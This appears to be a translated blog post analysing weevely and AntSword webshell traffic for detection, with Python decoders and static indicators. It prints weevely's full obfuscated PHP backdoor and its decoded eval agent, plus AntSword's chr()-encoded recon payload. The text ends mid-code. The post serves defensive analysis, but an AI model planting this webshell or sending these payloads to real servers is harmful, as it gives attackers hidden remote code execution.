Webshell traffic analysis


weevely, AntSword (蚁剑)

weevely

Environment: weevely 4.0.1

Generation

weevely generate <password> <filename>

Traffic analysis

Many earlier write-ups say the parameters are passed in the Referer header, but that has not been the case for a long time.

The current traffic looks just as described in "Weevely Webshell入侵检测之小试牛刀": it really is hard to spot any trace.

At present a few features can only be pinned down when the traffic is very short:

In the capture, the POST request's Content-Length is fixed at 83.

The response's Content-Length is 60.

The response body consists of 45 characters of base64-encoded, encrypted data and a 12-character numeric string.

1.png

With longer data, however, almost no feature is visible.

2.png

The article "入侵检测——weevely" mentions that connecting to the shell produces no traffic.

After trying it myself I found this is indeed the case; it can barely even be called connecting to the shell, since it sends no packets at all: any URL and password you type will drop you into the environment.

Detection

After the shell is planted

Once the shell is already in place it is very hard to detect; there are almost no common features,

apart from the short-traffic features mentioned above and the fact that everything sent and received is base64-encoded and encrypted.

So the main detection opportunity is before the shell is planted.

Before the shell is planted

Plaintext features:

  • <?php
  • str_replace("…");
  • ?>

<?php
$X='$jG++,$i++){$o.=$Gt{$iG}^$k{G$j};}}rGeturn $Go;}ifG (G@preg_mat';
$E='Gse64_encodGe(@x(@gzcGomprGGess($o),$k));priGnt("$GGp$kh$r$kf");}';
$D='$k="a675GGe634";$Gkh="5282dcGeffb96"G;G$kf=G"f1aacc14Gdd8cG";$p';
$a='e($Gm[1]),$k)G));$oG=@Gob_get_conteGntsG();G@ob_end_cleanG();G$r=@bGa';
$j='="zGGM0zH14OjoSmAsOe";GfunctiGon x($Gt,$Gk){G$c=strlen(G$k);G$l=str';
$O='lGeGn($t);$o="";foGr($iG=0;$i<$Gl;G){foGr($j=0;($j<$c&G&$Gi<G$l);';
$N=str_replace('v','','cvrveate_vfuvvvnction');
$V='GG)==1) {@ob_starGt();@GeGval(@gzGuncomGpress(@x(@GbasGeG64_decod';
$m='Gch("/G$khG(.+)$kf/",@fiGle_geGt_coGnGtents("pGhp://inpGut"),$m';
$R=str_replace('G','',$D.$j.$O.$X.$m.$V.$a.$E);

// var_dump($R);
$z=$N('',$R);
$z();
?>

This is the obfuscated source of the shell; the obfuscation is actually very simple:

random characters are inserted to evade inspection, and str_replace() strips them back out,

then the recovered string is turned into an anonymous function.
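The un-scrambling the loader performs is plain string arithmetic, so it can be replayed without executing the PHP. The Python below is an added example and not part of the original post: it takes the obfuscated sample above as input, replays the str_replace() assembly, pulls out the per-shell constants, and lists the indicators a scanner would look for. The regular expressions are tuned to this loader's shape (single-quoted chunks, a single-character str_replace('x','',…) strip, a variable called as a function); other generators will need different patterns.

```python
import re

# The obfuscated loader shown above (the page's own sample, used here as input).
LOADER = r"""<?php
$X='$jG++,$i++){$o.=$Gt{$iG}^$k{G$j};}}rGeturn $Go;}ifG (G@preg_mat';
$E='Gse64_encodGe(@x(@gzcGomprGGess($o),$k));priGnt("$GGp$kh$r$kf");}';
$D='$k="a675GGe634";$Gkh="5282dcGeffb96"G;G$kf=G"f1aacc14Gdd8cG";$p';
$a='e($Gm[1]),$k)G));$oG=@Gob_get_conteGntsG();G@ob_end_cleanG();G$r=@bGa';
$j='="zGGM0zH14OjoSmAsOe";GfunctiGon x($Gt,$Gk){G$c=strlen(G$k);G$l=str';
$O='lGeGn($t);$o="";foGr($iG=0;$i<$Gl;G){foGr($j=0;($j<$c&G&$Gi<G$l);';
$N=str_replace('v','','cvrveate_vfuvvvnction');
$V='GG)==1) {@ob_starGt();@GeGval(@gzGuncomGpress(@x(@GbasGeG64_decod';
$m='Gch("/G$khG(.+)$kf/",@fiGle_geGt_coGnGtents("pGhp://inpGut"),$m';
$R=str_replace('G','',$D.$j.$O.$X.$m.$V.$a.$E);
$z=$N('',$R);
$z();
?>"""

# $name='literal';   (the scrambled chunks)
CHUNK = re.compile(r"\$(\w+)='([^']*)';")
# $name=str_replace('c','', <'literal'> | <$a.$b.$c> );   (the un-scrambling step)
STRIP = re.compile(r"\$(\w+)=str_replace\('(.)','',(.+?)\);")
# the call that turns the recovered string into code: $z=$N('',$R);
DYNCALL = re.compile(r"\$\w+=\$\w+\('',\$\w+\);")
# per-shell constants as they appear at the start of the recovered agent
KEYS = re.compile(r'\$k="([^"]+)";\$kh="([^"]+)";\$kf="([^"]+)";\$p="([^"]+)";')


def recover(source: str) -> dict:
    """Replay the loader's string assembly in Python (no PHP is executed).

    Returns every variable the loader builds; env["R"] is the de-obfuscated agent.
    """
    env = {}
    for name, literal in CHUNK.findall(source):
        env[name] = literal
    for name, junk, arg in STRIP.findall(source):
        if arg.startswith("'"):
            value = arg.strip("'")
        else:
            # "$D.$j.$O..." -> concatenate the chunks in exactly that order
            value = "".join(env[part.lstrip("$")] for part in arg.split("."))
        env[name] = value.replace(junk, "")
    return env


def extract_keys(agent: str) -> dict:
    """Pull $k, $kh, $kf and $p out of the recovered agent code."""
    m = KEYS.search(agent)
    return dict(zip(("k", "kh", "kf", "p"), m.groups())) if m else {}


def loader_indicators(source: str) -> list:
    """Static hints, checked on the raw file, that this is a weevely-style loader."""
    hits = []
    if len(CHUNK.findall(source)) >= 4:
        hits.append("many short quoted chunks")
    if STRIP.search(source):
        hits.append("str_replace('x','',...) un-scrambling")
    if DYNCALL.search(source):
        hits.append("variable called as a function with ('',$var)")
    return hits


def agent_indicators(env: dict) -> list:
    """Behavioural hints in the recovered strings (what the agent actually does)."""
    recovered = " ".join(env.values())
    wanted = ("create_function", "php://input", "@eval(", "base64_decode", "gzuncompress")
    return [w for w in wanted if w in recovered]


if __name__ == "__main__":
    env = recover(LOADER)
    print(env["N"])                 # create_function
    print(env["R"])                 # the agent code shown further down the page
    print(extract_keys(env["R"]))
    print(loader_indicators(LOADER), agent_indicators(env))
```

Two of the three loader indicators (the chunk count and the single-character str_replace strip) are structural and survive a regeneration with a different padding letter, which is why they are checked on the raw file rather than on the recovered code.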

Calling var_dump($R) directly and formatting the output gives the following code:

<?php
$k="a675e634";
$kh="5282dceffb96";
$kf="f1aacc14dd8c";
$p="zM0zH14OjoSmAsOe";
function x($t,$k) {
    $c=strlen($k);
    $l=strlen($t);
    $o="";
    for ($i=0;$i<$l;) {
        for ($j=0;($j<$c&&$i<$l);$j++,$i++) {
            $o.=$t{$i}^$k{$j};
        }
    }
    return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
    @ob_start();
    @eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
    $o=@ob_get_contents();
    @ob_end_clean();
    $r=@base64_encode(@x(@gzcompress($o),$k));
    print("$p$kh$r$kf");
}

First, the request body is read with file_get_contents("php://input").

Then preg_match() matches it against /$kh(.+)$kf/ and stores the captures in $m.

Then output buffering is switched on with ob_start() so the result can be captured (and the buffer cleared afterwards).

Then $m[1], the first captured group, is base64-decoded, XOR-decrypted with the key $k in x(), and decompressed with gzuncompress(),

and the result is eval()'d; the output is then sent back. Sending mirrors receiving: the buffered output is gzcompress()ed, XORed with $k, base64-encoded and printed between $p$kh and $kf.
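Because the transport is XOR with $k followed by gzcompress, captured bodies can only be recovered if the agent file, and with it $k, $kh, $kf and $p, has been obtained from disk; this is the practical consequence of the "no common features" observation above. The Python below is an added example, neither weevely's code nor the post's: it reimplements x() and the decode chain from the agent above and applies it to a constructed request/response pair built with the sample's own constants (the command, the output and the padding around the markers are made up).

```python
import base64
import re
import zlib
from typing import Optional

# Constants recovered from the agent on disk; these are the values in the page's sample.
KEYS = {"k": "a675e634", "kh": "5282dceffb96", "kf": "f1aacc14dd8c", "p": "zM0zH14OjoSmAsOe"}


def xor_key(data: bytes, key: bytes) -> bytes:
    """The agent's x(): XOR each byte with the key, restarting the key every len(key) bytes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def unwrap(payload_b64: str, keys: dict) -> str:
    """base64 -> XOR with $k -> gzuncompress (zlib format), i.e. the agent's decode chain."""
    raw = xor_key(base64.b64decode(payload_b64), keys["k"].encode())
    return zlib.decompress(raw).decode("utf-8", errors="replace")


def decode_request(body: str, keys: dict) -> Optional[str]:
    """Recover the PHP the operator sent from a captured POST body (same regex as the agent)."""
    m = re.search(re.escape(keys["kh"]) + r"(.+)" + re.escape(keys["kf"]), body)
    return unwrap(m.group(1), keys) if m else None


def decode_response(body: str, keys: dict) -> Optional[str]:
    """Recover the command output from a captured response body laid out as $p$kh<payload>$kf."""
    head, tail = keys["p"] + keys["kh"], keys["kf"]
    if not (body.startswith(head) and body.endswith(tail)):
        return None
    return unwrap(body[len(head):-len(tail)], keys)


# --- used only to fabricate a sample capture for the demo and test ---
def wrap(text: str, keys: dict) -> str:
    """Inverse of unwrap(): gzcompress -> XOR with $k -> base64, as the agent does on output."""
    return base64.b64encode(xor_key(zlib.compress(text.encode()), keys["k"].encode())).decode()


SAMPLE_CODE = 'echo "hello from the shell";'      # constructed command
SAMPLE_OUTPUT = "hello from the shell"           # constructed output
# constructed: filler before/after the markers, which is why the agent uses a regex
SAMPLE_REQUEST = "q=x7Hq" + KEYS["kh"] + wrap(SAMPLE_CODE, KEYS) + KEYS["kf"] + "Lp"
SAMPLE_RESPONSE = KEYS["p"] + KEYS["kh"] + wrap(SAMPLE_OUTPUT, KEYS) + KEYS["kf"]

if __name__ == "__main__":
    print("request :", decode_request(SAMPLE_REQUEST, KEYS))
    print("response:", decode_response(SAMPLE_RESPONSE, KEYS))
    print("response Content-Length:", len(SAMPLE_RESPONSE))
```

In an investigation the two decode functions are what you run over the POST bodies and responses extracted from a capture: with the constants from the file they give back the exact PHP that was executed and what it returned, which is otherwise invisible.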

AntSword (蚁剑)

3.png

The default traffic features are very obvious; you can reproduce the parameter with a Python POST:

#!/usr/bin/python
# import requests
# url = "http://127.0.0.1/P/ant.php"
# data = {'ant':'@eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(95).ChR(101).ChR(114).ChR(114).ChR(111).ChR(114).ChR(115).ChR(34).ChR(44).ChR(32).ChR(34).ChR(48).ChR(34).ChR(41).ChR(59).ChR(64).ChR(115).ChR(101).ChR(116).ChR(95).ChR(116).ChR(105).ChR(109).ChR(101).ChR(95).ChR(108).ChR(105).ChR(109).ChR(105).ChR(116).ChR(40).ChR(48).ChR(41).ChR(59).ChR(36).ChR(111).ChR(112).ChR(100).ChR(105).ChR(114).ChR(61).ChR(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(103).ChR(101).ChR(116).ChR(40).ChR(34).ChR(111).ChR(112).ChR(101).ChR(110).ChR(95).ChR(98).ChR(97).ChR(115).ChR(101).ChR(100).ChR(105).ChR(114).ChR(34).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(36).ChR(111).ChR(112).ChR(100).ChR(105).ChR(114).ChR(41).ChR(32).ChR(123).ChR(36).ChR(111).ChR(99).ChR(119).ChR(100).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(83).ChR(67).ChR(82).ChR(73).ChR(80).ChR(84).ChR(95).ChR(70).ChR(73).ChR(76).ChR(69).ChR(78).ChR(65).ChR(77).ChR(69).ChR(34).ChR(93).ChR(41).ChR(59).ChR(36).ChR(111).ChR(112).ChR(97).ChR(114).ChR(114).ChR(61).ChR(112).ChR(114).ChR(101).ChR(103).ChR(95).ChR(115).ChR(112).ChR(108).ChR(105).ChR(116).ChR(40).ChR(34).ChR(47).ChR(59).ChR(124).ChR(58).ChR(47).ChR(34).ChR(44).ChR(36).ChR(111).ChR(112).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(64).ChR(97).ChR(114).ChR(114).ChR(97).ChR(121).ChR(95).ChR(112).ChR(117).ChR(115).ChR(104).ChR(40).ChR(36).ChR(111).ChR(112).ChR(97).ChR(114).ChR(114).ChR(44).ChR(36).ChR(111).ChR(99).ChR(119).ChR(100).ChR(44).ChR(115).ChR(121).ChR(115).ChR(95).ChR(103).ChR(101).ChR(116).ChR(95).ChR(116).ChR(101).ChR(109).ChR(112).ChR(95).ChR(100).ChR(105).ChR(114).ChR(40).ChR(41).ChR(41).ChR(59).ChR(102).ChR(111).ChR(114).ChR(101).ChR(97).ChR(99).ChR(104).ChR(40).ChR(36).ChR(111).ChR(112).ChR(97).ChR(114).ChR(114).ChR(32)
.ChR(97).ChR(115).ChR(32).ChR(36).ChR(105).ChR(116).ChR(101).ChR(109).ChR(41).ChR(32).ChR(123).ChR(105).ChR(102).ChR(40).ChR(33).ChR(64).ChR(105).ChR(115).ChR(95).ChR(119).ChR(114).ChR(105).ChR(116).ChR(97).ChR(98).ChR(108).ChR(101).ChR(40).ChR(36).ChR(105).ChR(116).ChR(101).ChR(109).ChR(41).ChR(41).ChR(123).ChR(99).ChR(111).ChR(110).ChR(116).ChR(105).ChR(110).ChR(117).ChR(101).ChR(59).ChR(125).ChR(59).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(61).ChR(36).ChR(105).ChR(116).ChR(101).ChR(109).ChR(46).ChR(34).ChR(47).ChR(46).ChR(99).ChR(56).ChR(56).ChR(97).ChR(99).ChR(51).ChR(54).ChR(49).ChR(34).ChR(59).ChR(64).ChR(109).ChR(107).ChR(100).ChR(105).ChR(114).ChR(40).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(33).ChR(64).ChR(102).ChR(105).ChR(108).ChR(101).ChR(95).ChR(101).ChR(120).ChR(105).ChR(115).ChR(116).ChR(115).ChR(40).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(41).ChR(123).ChR(99).ChR(111).ChR(110).ChR(116).ChR(105).ChR(110).ChR(117).ChR(101).ChR(59).ChR(125).ChR(64).ChR(99).ChR(104).ChR(100).ChR(105).ChR(114).ChR(40).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(111).ChR(112).ChR(101).ChR(110).ChR(95).ChR(98).ChR(97).ChR(115).ChR(101).ChR(100).ChR(105).ChR(114).ChR(34).ChR(44).ChR(32).ChR(34).ChR(46).ChR(46).ChR(34).ChR(41).ChR(59).ChR(36).ChR(99).ChR(110).ChR(116).ChR(97).ChR(114).ChR(114).ChR(61).ChR(64).ChR(112).ChR(114).ChR(101).ChR(103).ChR(95).ChR(115).ChR(112).ChR(108).ChR(105).ChR(116).ChR(40).ChR(34).ChR(47).ChR(92).ChR(92).ChR(92).ChR(92).ChR(124).ChR(92).ChR(47).ChR(47).ChR(34).ChR(44).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(102).ChR(111).ChR(114).ChR(40).ChR(36).ChR(105).ChR(61).ChR(48).ChR(59).ChR(36).ChR(105).ChR(60).ChR(115).ChR(105).ChR(122).ChR(101).ChR(111).ChR(102).ChR(40).ChR(36).ChR(99).ChR(110).ChR(116).ChR(9
7).ChR(114).ChR(114).ChR(41).ChR(59).ChR(36).ChR(105).ChR(43).ChR(43).ChR(41).ChR(123).ChR(64).ChR(99).ChR(104).ChR(100).ChR(105).ChR(114).ChR(40).ChR(34).ChR(46).ChR(46).ChR(34).ChR(41).ChR(59).ChR(125).ChR(59).ChR(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(111).ChR(112).ChR(101).ChR(110).ChR(95).ChR(98).ChR(97).ChR(115).ChR(101).ChR(100).ChR(105).ChR(114).ChR(34).ChR(44).ChR(34).ChR(47).ChR(34).ChR(41).ChR(59).ChR(64).ChR(114).ChR(109).ChR(100).ChR(105).ChR(114).ChR(40).ChR(36).ChR(116).ChR(109).ChR(100).ChR(105).ChR(114).ChR(41).ChR(59).ChR(98).ChR(114).ChR(101).ChR(97).ChR(107).ChR(59).ChR(125).ChR(59).ChR(125).ChR(59).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(123).ChR(114).ChR(101).ChR(116).ChR(117).ChR(114).ChR(110).ChR(32).ChR(36).ChR(111).ChR(117).ChR(116).ChR(59).ChR(125).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(123).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(61).ChR(111).ChR(98).ChR(95).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(111).ChR(110).ChR(116).ChR(101).ChR(110).ChR(116).ChR(115).ChR(40).ChR(41).ChR(59).ChR(111).ChR(98).ChR(95).ChR(101).ChR(110).ChR(100).ChR(95).ChR(99).ChR(108).ChR(101).ChR(97).ChR(110).ChR(40).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(102).ChR(97).ChR(100).ChR(101).ChR(54).ChR(34).ChR(46).ChR(34).ChR(102).ChR(51).ChR(56).ChR(97).ChR(52).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(64).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(101).ChR(49).ChR(51).ChR(34).ChR(46).ChR(34).ChR(48).ChR(98).ChR(48).ChR(53).
ChR(34).ChR(59).ChR(125).ChR(111).ChR(98).ChR(95).ChR(115).ChR(116).ChR(97).ChR(114).ChR(116).ChR(40).ChR(41).ChR(59).ChR(116).ChR(114).ChR(121).ChR(123).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(83).ChR(67).ChR(82).ChR(73).ChR(80).ChR(84).ChR(95).ChR(70).ChR(73).ChR(76).ChR(69).ChR(78).ChR(65).ChR(77).ChR(69).ChR(34).ChR(93).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(36).ChR(68).ChR(61).ChR(61).ChR(34).ChR(34).ChR(41).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(80).ChR(65).ChR(84).ChR(72).ChR(95).ChR(84).ChR(82).ChR(65).ChR(78).ChR(83).ChR(76).ChR(65).ChR(84).ChR(69).ChR(68).ChR(34).ChR(93).ChR(41).ChR(59).ChR(36).ChR(82).ChR(61).ChR(34).ChR(123).ChR(36).ChR(68).ChR(125).ChR(9).ChR(34).ChR(59).ChR(105).ChR(102).ChR(40).ChR(115).ChR(117).ChR(98).ChR(115).ChR(116).ChR(114).ChR(40).ChR(36).ChR(68).ChR(44).ChR(48).ChR(44).ChR(49).ChR(41).ChR(33).ChR(61).ChR(34).ChR(47).ChR(34).ChR(41).ChR(123).ChR(102).ChR(111).ChR(114).ChR(101).ChR(97).ChR(99).ChR(104).ChR(40).ChR(114).ChR(97).ChR(110).ChR(103).ChR(101).ChR(40).ChR(34).ChR(67).ChR(34).ChR(44).ChR(34).ChR(90).ChR(34).ChR(41).ChR(97).ChR(115).ChR(32).ChR(36).ChR(76).ChR(41).ChR(105).ChR(102).ChR(40).ChR(105).ChR(115).ChR(95).ChR(100).ChR(105).ChR(114).ChR(40).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(41).ChR(41).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(59).ChR(125).ChR(101).ChR(108).ChR(115).ChR(101).ChR(123).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(47).ChR(34).ChR(59).ChR(125).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(34).ChR(59).ChR(36).ChR(117).ChR(61).ChR(40).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(95).ChR(101).ChR(120).ChR(105).C
hR(115).ChR(116).ChR(115).ChR(40).ChR(34).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(103).ChR(105).ChR(100).ChR(34).ChR(41).ChR(41).ChR(63).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(112).ChR(119).ChR(117).ChR(105).ChR(100).ChR(40).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(117).ChR(105).ChR(100).ChR(40).ChR(41).ChR(41).ChR(58).ChR(34).ChR(34).ChR(59).ChR(36).ChR(115).ChR(61).ChR(40).ChR(36).ChR(117).ChR(41).ChR(63).ChR(36).ChR(117).ChR(91).ChR(34).ChR(110).ChR(97).ChR(109).ChR(101).ChR(34).ChR(93).ChR(58).ChR(64).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(117).ChR(114).ChR(114).ChR(101).ChR(110).ChR(116).ChR(95).ChR(117).ChR(115).ChR(101).ChR(114).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(112).ChR(104).ChR(112).ChR(95).ChR(117).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(123).ChR(36).ChR(115).ChR(125).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(36).ChR(82).ChR(59).ChR(59).ChR(125).ChR(99).ChR(97).ChR(116).ChR(99).ChR(104).ChR(40).ChR(69).ChR(120).ChR(99).ChR(101).ChR(112).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(36).ChR(101).ChR(41).ChR(123).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(69).ChR(82).ChR(82).ChR(79).ChR(82).ChR(58).ChR(47).ChR(47).ChR(34).ChR(46).ChR(36).ChR(101).ChR(45).ChR(62).ChR(103).ChR(101).ChR(116).ChR(77).ChR(101).ChR(115).ChR(115).ChR(97).ChR(103).ChR(101).ChR(40).ChR(41).ChR(59).ChR(125).ChR(59).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(59).ChR(100).ChR(105).ChR(101).ChR(40).ChR(41).ChR(59));'}
# r = requests.post(url,data)
data = [64,105,110,105,95,115,101,116,40,34,100,105,115,112,108,97,121,95,101,114,114,111,114,115,34,44,32,34,48,34,41,59,64,115,101,116,95,116,105,109,101,95,108,105,109,105,116,40,48,41,59,36,111,112,100,105,114,61,64,105,110,105,95,103,101,116,40,34,111,112,101,110,95,98,97,115,101,100,105,114,34,41,59,105,102,40,36,111,112,100,105,114,41,32,123,36,111,99,119,100,61,100,105,114,110,97,109,101,40,36,95,83,69,82,86,69,82,91,34,83,67,82,73,80,84,95,70,73,76,69,78,65,77,69,34,93,41,59,36,111,112,97,114,114,61,112,114,101,103,95,115,112,108,105,116,40,34,47,59,124,58,47,34,44,36,111,112,100,105,114,41,59,64,97,114,114,97,121,95,112,117,115,104,40,36,111,112,97,114,114,44,36,111,99,119,100,44,115,121,115,95,103,101,116,95,116,101,109,112,95,100,105,114,40,41,41,59,102,111,114,101,97,99,104,40,36,111,112,97,114,114,32,97,115,32,36,105,116,101,109,41,32,123,105,102,40,33,64,105,115,95,119,114,105,116,97,98,108,101,40,36,105,116,101,109,41,41,123,99,111,110,116,105,110,117,101,59,125,59,36,116,109,100,105,114,61,36,105,116,101,109,46,34,47,46,99,56,56,97,99,51,54,49,34,59,64,109,107,100,105,114,40,36,116,109,100,105,114,41,59,105,102,40,33,64,102,105,108,101,95,101,120,105,115,116,115,40,36,116,109,100,105,114,41,41,123,99,111,110,116,105,110,117,101,59,125,64,99,104,100,105,114,40,36,116,109,100,105,114,41,59,64,105,110,105,95,115,101,116,40,34,111,112,101,110,95,98,97,115,101,100,105,114,34,44,32,34,46,46,34,41,59,36,99,110,116,97,114,114,61,64,112,114,101,103,95,115,112,108,105,116,40,34,47,92,92,92,92,124,92,47,47,34,44,36,116,109,100,105,114,41,59,102,111,114,40,36,105,61,48,59,36,105,60,115,105,122,101,111,102,40,36,99,110,116,97,114,114,41,59,36,105,43,43,41,123,64,99,104,100,105,114,40,34,46,46,34,41,59,125,59,64,105,110,105,95,115,101,116,40,34,111,112,101,110,95,98,97,115,101,100,105,114,34,44,34,47,34,41,59,64,114,109,100,105,114,40,36,116,109,100,105,114,41,59,98,114,101,97,107,59,125,59,125,59,59,102,117,110,99,116,105,111,110,32,97,115,101,110,99,40,36,111,1
17,116,41,123,114,101,116,117,114,110,32,36,111,117,116,59,125,59,102,117,110,99,116,105,111,110,32,97,115,111,117,116,112,117,116,40,41,123,36,111,117,116,112,117,116,61,111,98,95,103,101,116,95,99,111,110,116,101,110,116,115,40,41,59,111,98,95,101,110,100,95,99,108,101,97,110,40,41,59,101,99,104,111,32,34,102,97,100,101,54,34,46,34,102,51,56,97,52,34,59,101,99,104,111,32,64,97,115,101,110,99,40,36,111,117,116,112,117,116,41,59,101,99,104,111,32,34,101,49,51,34,46,34,48,98,48,53,34,59,125,111,98,95,115,116,97,114,116,40,41,59,116,114,121,123,36,68,61,100,105,114,110,97,109,101,40,36,95,83,69,82,86,69,82,91,34,83,67,82,73,80,84,95,70,73,76,69,78,65,77,69,34,93,41,59,105,102,40,36,68,61,61,34,34,41,36,68,61,100,105,114,110,97,109,101,40,36,95,83,69,82,86,69,82,91,34,80,65,84,72,95,84,82,65,78,83,76,65,84,69,68,34,93,41,59,36,82,61,34,123,36,68,125,9,34,59,105,102,40,115,117,98,115,116,114,40,36,68,44,48,44,49,41,33,61,34,47,34,41,123,102,111,114,101,97,99,104,40,114,97,110,103,101,40,34,67,34,44,34,90,34,41,97,115,32,36,76,41,105,102,40,105,115,95,100,105,114,40,34,123,36,76,125,58,34,41,41,36,82,46,61,34,123,36,76,125,58,34,59,125,101,108,115,101,123,36,82,46,61,34,47,34,59,125,36,82,46,61,34,9,34,59,36,117,61,40,102,117,110,99,116,105,111,110,95,101,120,105,115,116,115,40,34,112,111,115,105,120,95,103,101,116,101,103,105,100,34,41,41,63,64,112,111,115,105,120,95,103,101,116,112,119,117,105,100,40,64,112,111,115,105,120,95,103,101,116,101,117,105,100,40,41,41,58,34,34,59,36,115,61,40,36,117,41,63,36,117,91,34,110,97,109,101,34,93,58,64,103,101,116,95,99,117,114,114,101,110,116,95,117,115,101,114,40,41,59,36,82,46,61,112,104,112,95,117,110,97,109,101,40,41,59,36,82,46,61,34,9,123,36,115,125,34,59,101,99,104,111,32,36,82,59,59,125,99,97,116,99,104,40,69,120,99,101,112,116,105,111,110,32,36,101,41,123,101,99,104,111,32,34,69,82,82,79,82,58,47,47,34,46,36,101,45,62,103,101,116,77,101,115,115,97,103,101,40,41,59,125,59,97,115,111,117,116,112,117,116,40,41,59,100,105,101,
40,41,59]

# decode the chr() argument list back into the PHP it builds
for i in data:
    print(chr(i), end="")
print()

The decoded parameter content is as follows:

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split("/;|:/",$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.c88ac361";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "fade6"."f38a4";echo @asenc($output);echo "e13"."0b05";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}    ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="    ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="    {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
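The capture above is easy to match statically: a form field whose value is eval( in any letter case applied to a chain of chr(N) calls. The Python below is an added example, not part of the post or of AntSword; it decodes such a chain back to the PHP it builds and checks the result for strings from the default stub shown above. The sample body is the start of the capture shown above, truncated after the first two statements so it stays short; the parameter name ant is whatever the operator chose and is not used as a signal.

```python
import re
from urllib.parse import unquote_plus

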